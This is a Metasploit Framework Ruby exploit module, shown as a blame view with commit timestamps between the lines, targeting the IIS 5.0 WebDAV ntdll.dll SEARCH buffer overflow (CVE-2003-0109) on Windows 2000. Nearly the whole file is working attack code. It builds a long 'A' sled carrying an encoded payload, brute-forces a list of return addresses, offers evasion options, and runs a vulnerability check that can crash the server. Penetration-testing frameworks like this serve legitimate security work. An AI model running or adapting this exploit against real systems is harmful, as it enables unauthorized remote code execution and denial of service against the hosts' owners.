2007-02-18 00:10:39 +00:00
|
|
|
##
|
2007-02-27 08:58:45 +00:00
|
|
|
# $Id$
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
2010-02-22 22:30:38 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2007-02-18 00:10:39 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
2005-11-27 18:42:44 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2009-12-06 05:50:37 +00:00
|
|
|
Rank = GreatRanking
|
2005-11-27 18:42:44 +00:00
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
2005-11-27 18:42:44 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
2010-02-22 22:30:38 +00:00
|
|
|
super(update_info(info,
|
2006-09-13 06:25:40 +00:00
|
|
|
'Name' => 'Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow',
|
2005-11-27 18:42:44 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This exploits a buffer overflow in NTDLL.dll on Windows 2000
|
|
|
|
through the SEARCH WebDAV method in IIS. This particular
|
|
|
|
module only works against Windows 2000. It should have a
|
|
|
|
reasonable chance of success against any service pack.
|
|
|
|
},
|
|
|
|
'Author' => [ 'hdm' ],
|
2006-01-21 22:10:20 +00:00
|
|
|
'License' => MSF_LICENSE,
|
2005-11-27 18:42:44 +00:00
|
|
|
'Version' => '$Revision$',
|
|
|
|
'References' =>
|
|
|
|
[
|
2009-06-07 20:20:42 +00:00
|
|
|
[ 'CVE', '2003-0109'],
|
2005-11-27 18:42:44 +00:00
|
|
|
[ 'OSVDB', '4467'],
|
2009-06-07 20:20:42 +00:00
|
|
|
[ 'BID', '7116'],
|
2010-07-06 21:59:16 +00:00
|
|
|
[ 'MSB', 'MS03-007']
|
2005-11-27 18:42:44 +00:00
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 512,
|
|
|
|
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
|
2006-07-31 02:01:14 +00:00
|
|
|
'StackAdjustment' => -3500,
|
2005-11-27 18:42:44 +00:00
|
|
|
},
|
2006-02-19 04:18:21 +00:00
|
|
|
'Platform' => 'win',
|
2010-02-22 22:30:38 +00:00
|
|
|
'Targets' =>
|
2005-11-27 18:42:44 +00:00
|
|
|
[
|
2007-02-27 09:16:40 +00:00
|
|
|
[ 'Automatic Brute Force', { } ],
|
2005-11-27 18:42:44 +00:00
|
|
|
],
|
|
|
|
'DisclosureDate' => 'May 30 2003',
|
|
|
|
'DefaultTarget' => 0))
|
2006-02-06 22:47:06 +00:00
|
|
|
|
2010-07-06 21:59:16 +00:00
|
|
|
register_evasion_options(
|
|
|
|
[
|
2006-02-06 22:47:06 +00:00
|
|
|
OptBool.new('invalid_search_request', [false, 'Replace the valid XML search with random data', 'false']),
|
|
|
|
|
|
|
|
# XXX - ugh, there has to be a better way to remove entries from an
|
|
|
|
# enum that overwriting the evalable enum option
|
|
|
|
OptEnum.new('HTTP::uri_encode', [false, 'Enable URI encoding', 'none', ['none','hex-normal'], 'none'])
|
|
|
|
], self.class
|
|
|
|
)
|
|
|
|
|
2006-02-06 21:12:37 +00:00
|
|
|
deregister_options('HTTP::junk_params', 'HTTP::header_folding')
|
2005-11-27 18:42:44 +00:00
|
|
|
end
|
|
|
|
|
2006-09-17 08:00:37 +00:00
|
|
|
def autofilter
|
2010-02-22 22:30:38 +00:00
|
|
|
# Common vulnerability scanning tools report port 445/139
|
|
|
|
# due to how they test for the vulnerability. Remap this
|
|
|
|
# back to 80 for automated exploitation
|
|
|
|
|
2006-09-17 08:00:37 +00:00
|
|
|
rport = datastore['RPORT'].to_i
|
|
|
|
if ( rport == 139 or rport == 445 )
|
|
|
|
rport = 80
|
|
|
|
end
|
2010-02-22 22:30:38 +00:00
|
|
|
|
2006-09-17 08:00:37 +00:00
|
|
|
true
|
|
|
|
end
|
2010-02-22 22:30:38 +00:00
|
|
|
|
2005-11-27 18:42:44 +00:00
|
|
|
def check
|
|
|
|
url = 'x' * 65535
|
|
|
|
xml =
|
|
|
|
"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
|
|
|
|
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
|
2010-02-22 22:30:38 +00:00
|
|
|
|
2006-12-28 23:42:36 +00:00
|
|
|
response = send_request_cgi({
|
2007-03-08 13:54:11 +00:00
|
|
|
'uri' => '/' + url,
|
2006-12-28 23:42:36 +00:00
|
|
|
'ctype' => 'text/xml',
|
|
|
|
'method' => 'SEARCH',
|
|
|
|
'data' => xml
|
|
|
|
}, 5)
|
2010-02-22 22:30:38 +00:00
|
|
|
|
2006-02-06 21:12:37 +00:00
|
|
|
|
|
|
|
if (response and response.body =~ /Server Error\(exception/)
|
2010-02-22 22:30:38 +00:00
|
|
|
return Exploit::CheckCode::Vulnerable
|
2005-11-27 18:42:44 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
# Did the server stop acceping requests?
|
|
|
|
begin
|
2006-12-28 23:42:36 +00:00
|
|
|
send_request_raw({'uri' => '/'}, 5)
|
2006-02-06 21:12:37 +00:00
|
|
|
rescue
|
2005-11-27 18:42:44 +00:00
|
|
|
return Exploit::CheckCode::Vulnerable
|
|
|
|
end
|
|
|
|
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
2006-02-06 21:12:37 +00:00
|
|
|
# verify the service is running up front
|
2006-12-28 23:42:36 +00:00
|
|
|
send_request_raw({'uri' => '/'}, 5)
|
2006-02-06 21:12:37 +00:00
|
|
|
|
2005-11-27 18:42:44 +00:00
|
|
|
# The targets in the most likely order they will work
|
|
|
|
targets =
|
|
|
|
[
|
|
|
|
# Almost Targetted :)
|
|
|
|
"\x4f\x4e", # =SP3
|
|
|
|
"\x41\x42", # ~SP0 ~SP2
|
|
|
|
"\x41\x43", # ~SP1, ~SP2
|
|
|
|
|
|
|
|
# Generic Bruteforce
|
|
|
|
"\x41\xc1",
|
|
|
|
"\x41\xc3",
|
|
|
|
"\x41\xc9",
|
|
|
|
"\x41\xca",
|
|
|
|
"\x41\xcb",
|
|
|
|
"\x41\xcc",
|
|
|
|
"\x41\xcd",
|
|
|
|
"\x41\xce",
|
|
|
|
"\x41\xcf",
|
|
|
|
"\x41\xd0",
|
|
|
|
]
|
2006-02-06 22:47:06 +00:00
|
|
|
|
2005-11-27 18:42:44 +00:00
|
|
|
xml =
|
|
|
|
"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
|
|
|
|
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
|
2010-02-22 22:30:38 +00:00
|
|
|
|
2006-02-06 22:47:06 +00:00
|
|
|
if datastore['invalid_search_request'] == true
|
2007-03-01 08:21:36 +00:00
|
|
|
xml = rand_text(rand(1024) + 32)
|
2006-02-06 22:47:06 +00:00
|
|
|
end
|
|
|
|
|
2007-02-27 09:16:40 +00:00
|
|
|
# The nop generator can be cpu-intensive for large buffers, so we use a static sled of 'A'
|
|
|
|
# This decodes to "inc ecx"
|
2010-02-22 22:30:38 +00:00
|
|
|
|
2007-02-27 09:16:40 +00:00
|
|
|
url = 'A' * 65516
|
2006-02-06 21:12:37 +00:00
|
|
|
url[ url.length - payload.encoded.length, payload.encoded.length ] = payload.encoded
|
2010-02-22 22:30:38 +00:00
|
|
|
|
2005-11-27 18:42:44 +00:00
|
|
|
targets.each { |ret|
|
2010-02-22 22:30:38 +00:00
|
|
|
|
2006-02-06 21:12:37 +00:00
|
|
|
print_status("Trying return address 0x%.8x..." % Rex::Text.to_unicode(ret).unpack('V')[0])
|
2005-11-27 18:42:44 +00:00
|
|
|
url[ 283, 2 ] = ret
|
2010-02-22 22:30:38 +00:00
|
|
|
|
2005-11-27 18:42:44 +00:00
|
|
|
begin
|
2006-12-28 23:42:36 +00:00
|
|
|
send_request_cgi({
|
2007-02-27 09:16:40 +00:00
|
|
|
'uri' => '/' + url,
|
2006-12-28 23:42:36 +00:00
|
|
|
'ctype' => 'text/xml',
|
|
|
|
'method' => 'SEARCH',
|
|
|
|
'data' => xml
|
|
|
|
}, 5)
|
2005-11-27 18:42:44 +00:00
|
|
|
handler
|
|
|
|
rescue => e
|
2008-12-19 07:11:08 +00:00
|
|
|
print_error("Attempt failed: #{e}")
|
2005-11-27 18:42:44 +00:00
|
|
|
end
|
2010-02-22 22:30:38 +00:00
|
|
|
|
2005-11-27 18:42:44 +00:00
|
|
|
1.upto(8) { |i|
|
2010-06-22 19:11:05 +00:00
|
|
|
select(nil,nil,nil,0.25)
|
2005-11-27 18:42:44 +00:00
|
|
|
return if self.session_created?
|
|
|
|
}
|
2010-02-22 22:30:38 +00:00
|
|
|
|
2006-02-06 21:12:37 +00:00
|
|
|
if !service_running?
|
|
|
|
print_error('Giving up, IIS must have completely crashed')
|
|
|
|
return
|
|
|
|
end
|
2005-11-27 18:42:44 +00:00
|
|
|
}
|
|
|
|
end
|
|
|
|
|
|
|
|
# Try connecting to the server up to 20 times, with a two second gap
|
|
|
|
# This gives the server time to recover after a failed exploit attempt
|
2006-02-06 21:12:37 +00:00
|
|
|
def service_running?
|
|
|
|
print_status('Checking if IIS is back up after a failed attempt...')
|
2005-11-27 18:42:44 +00:00
|
|
|
1.upto(20) {|i|
|
|
|
|
begin
|
2006-12-28 23:42:36 +00:00
|
|
|
send_request_raw({'uri' => '/'}, 5)
|
2006-02-06 21:12:37 +00:00
|
|
|
rescue
|
2010-07-25 21:37:54 +00:00
|
|
|
print_error("Connection failed (#{i} of 20)...")
|
2010-06-22 19:11:05 +00:00
|
|
|
select(nil,nil,nil,2)
|
2005-11-27 18:42:44 +00:00
|
|
|
next
|
|
|
|
end
|
2006-02-06 21:12:37 +00:00
|
|
|
return true
|
2005-11-27 18:42:44 +00:00
|
|
|
}
|
2006-02-06 21:12:37 +00:00
|
|
|
return false
|
2005-11-27 18:42:44 +00:00
|
|
|
end
|
|
|
|
|
2009-06-07 20:20:42 +00:00
|
|
|
end
|